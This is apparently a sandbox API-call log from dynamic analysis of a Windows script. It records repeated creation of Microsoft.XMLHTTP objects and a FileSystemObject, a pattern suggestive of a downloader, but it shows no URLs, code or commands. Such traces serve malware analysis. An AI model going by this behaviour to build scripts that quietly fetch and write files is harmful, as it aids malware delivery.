	[0271.779] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0271.779] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0271.779] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0271.779] ??2@YAPEAX_K@Z () returned 0x62f350
	[0271.779] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0271.779] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0271.779] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0271.779] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0271.779] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0271.779] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0271.779] SysStringLen (param_1=0x0) returned 0x0
	[0271.780] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0271.782] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0271.782] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0271.782] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0271.783] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0271.783] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0271.783] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0272.448] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0272.448] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0272.448] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0272.450] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0272.450] SysStringLen (param_1=0x0) returned 0x0
	[0272.450] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0272.450] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0272.450] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0272.450] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0272.450] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0272.450] ??2@YAPEAX_K@Z () returned 0x62f310
	[0272.450] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f310) 
	[0272.450] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0272.450] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0272.450] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0272.451] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0272.451] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0272.451] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0272.453] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0272.453] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0272.453] SysStringLen (param_1=0x0) returned 0x0
	[0272.453] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0272.454] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0272.454] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74a0) returned 0x0
	[0272.454] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0272.454] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7508) returned 0x0
	[0272.454] ??2@YAPEAX_K@Z () returned 0x62f330
	[0272.454] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7508, pUnkSite=0x62f330) 
	[0272.454] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0272.454] XMLHTTPRequest:IUnknown:Release (This=0x49c7508) returned 0x0
	[0272.454] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74a0) returned 0x0
	[0272.454] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74a0) returned 0x3
	[0272.454] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0272.454] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0272.454] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0272.454] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0272.454] SysStringLen (param_1=0x0) returned 0x0
	[0272.454] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0272.455] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0272.455] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c20) returned 0x0
	[0272.455] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0272.455] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c20, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7728) returned 0x0
	[0272.455] ??2@YAPEAX_K@Z () returned 0x62f310
	[0272.455] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7728, pUnkSite=0x62f310) 
	[0272.455] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0272.455] XMLHTTPRequest:IUnknown:Release (This=0x49c7728) returned 0x0
	[0272.455] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c20, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c20) returned 0x0
	[0272.455] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c20) returned 0x3
	[0272.455] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c20, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0272.455] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c20, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0272.455] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c20, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0272.455] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0272.455] SysStringLen (param_1=0x0) returned 0x0
	[0272.455] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0272.455] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0272.455] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0272.456] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0272.456] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7508) returned 0x0
	[0272.456] ??2@YAPEAX_K@Z () returned 0x62f330
	[0272.456] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7508, pUnkSite=0x62f330) 
	[0272.456] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0272.456] XMLHTTPRequest:IUnknown:Release (This=0x49c7508) returned 0x0
	[0272.456] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0272.456] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0272.456] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0272.456] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0272.456] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0272.456] longjmp () 
	[0272.456] longjmp () 
	[0272.456] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0272.456] SysStringLen (param_1=0x0) returned 0x0
	[0272.456] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0272.456] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0272.457] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74a0) returned 0x0
	[0272.457] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0272.457] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7728) returned 0x0
	[0272.457] ??2@YAPEAX_K@Z () returned 0x62f310
	[0272.457] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7728, pUnkSite=0x62f310) 
	[0272.457] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0272.457] XMLHTTPRequest:IUnknown:Release (This=0x49c7728) returned 0x0
	[0272.457] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74a0) returned 0x0
	[0272.457] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74a0) returned 0x3
	[0272.457] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0272.457] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0272.457] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0272.457] longjmp () 
	[0272.457] longjmp () 
	[0272.457] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0272.457] SysStringLen (param_1=0x0) returned 0x0
